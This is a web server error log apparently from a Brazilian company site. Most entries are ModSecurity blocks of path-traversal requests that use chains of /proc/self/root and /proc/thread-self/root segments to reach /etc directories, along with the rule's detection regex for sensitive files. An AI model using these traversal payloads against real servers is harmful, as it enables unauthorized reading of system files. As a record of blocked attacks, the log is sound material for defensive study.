[hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwmT_u8EFLIOrSqIpu9igAAAlQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:37:57.874334 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.243.128:58394] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwmZQkwaGbbGflqUZDdpQAAAMw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:38:02.133805 2026] [proxy_fcgi:error] [pid 17887:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:43202] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:38:09.209890 2026] [:error] [pid 17887:tid 140411666392832] [client 74.7.243.128:58394] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwmcQkwaGbbGflqUZDdtQAAAMk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:38:11.536766 2026] [:error] [pid 31803:tid 140411582465792] [client 74.7.241.31:52308] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwmc-yqAr6etmhZHNp05gAAAFM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:38:15.467425 2026] [:error] [pid 14269:tid 140411716749056] [client 74.7.243.128:60300] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwmdwbLMZ6AikZjR9VyfwAAAAM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:38:18.350757 2026] [:error] [pid 17887:tid 140411674785536] [client 74.7.241.31:56786] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwmegkwaGbbGflqUZDdvQAAAMg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:38:24.131930 2026] [proxy_fcgi:error] [pid 26799:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:43970] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:38:24.578803 2026] [mime_magic:error] [pid 26799:tid 140411691570944] (70014)End of file found: [client 57.141.18.87:48942] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 13:38:36.310687 2026] [:error] [pid 14269:tid 140411574073088] [client 74.7.243.128:60300] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwmjAbLMZ6AikZjR9VyiwAAABQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:38:37.994264 2026] [core:alert] [pid 17653:tid 140411741927168] [client 57.141.18.93:49370] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 13:38:46.125790 2026] [proxy_fcgi:error] [pid 31803:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:44696] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:38:46.348221 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.241.31:56794] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwmluoXxyEfFpUF8f8iAQAAAUk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:39:02.363908 2026] [:error] [pid 14269:tid 140411616036608] [client 74.7.243.128:48668] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwmpgbLMZ6AikZjR9VymgAAAA8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:39:09.410008 2026] [proxy_fcgi:error] [pid 17653:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:45484] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:39:10.410480 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.241.31:59072] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwmrta6ubjKNq_cu4ZsJwAAA1I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:39:12.066741 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.241.31:38542] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwmsAkwaGbbGflqUZDd4gAAANU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:39:15.535717 2026] [:error] [pid 27403:tid 140411582465792] [client 74.7.241.31:38550] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwmsxkFeYa1D6dYQnAGowAAAdM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:39:17.339095 2026] [:error] [pid 17653:tid 140411658000128] [client 74.7.241.31:52228] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwmtcdf6f5d65gmYZSOpwAAAso"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:39:22.427442 2026] [:error] [pid 17653:tid 140411632822016] [client 74.7.241.31:52242] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwmusdf6f5d65gmYZSOsQAAAs0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:39:24.334814 2026] [proxy_fcgi:error] [pid 17653:tid 140411565680384] [client 84.247.146.193:45122] AH01071: Got error 'Primary script unknown'
[Thu Mar 19 13:39:24.422740 2026] [:error] [pid 17653:tid 140411733534464] [client 74.7.241.31:52242] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwmusdf6f5d65gmYZSOswAAAsE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:39:25.655053 2026] [:error] [pid 17653:tid 140411741927168] [client 74.7.241.31:52242] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwmvcdf6f5d65gmYZSOtQAAAsA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:39:27.145976 2026] [:error] [pid 17887:tid 140411708356352] [client 74.7.243.128:53496] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwmvwkwaGbbGflqUZDd9gAAAMQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:39:30.175973 2026] [:error] [pid 17653:tid 140411632822016] [client 74.7.241.31:52242] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwmwsdf6f5d65gmYZSOuQAAAs0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:39:31.035677 2026] [proxy_fcgi:error] [pid 14269:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:46124] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:39:38.015190 2026] [:error] [pid 17653:tid 140411540502272] [client 74.7.241.31:36296] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwmysdf6f5d65gmYZSOxgAAAtg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:39:40.633536 2026] [:error] [pid 30077:tid 140411699963648] [client 74.7.241.31:35314] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwmy_u8EFLIOrSqIpu92QAAAkU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:39:41.938970 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.241.31:35326] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwmzeyqAr6etmhZHNp1GAAAAEc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
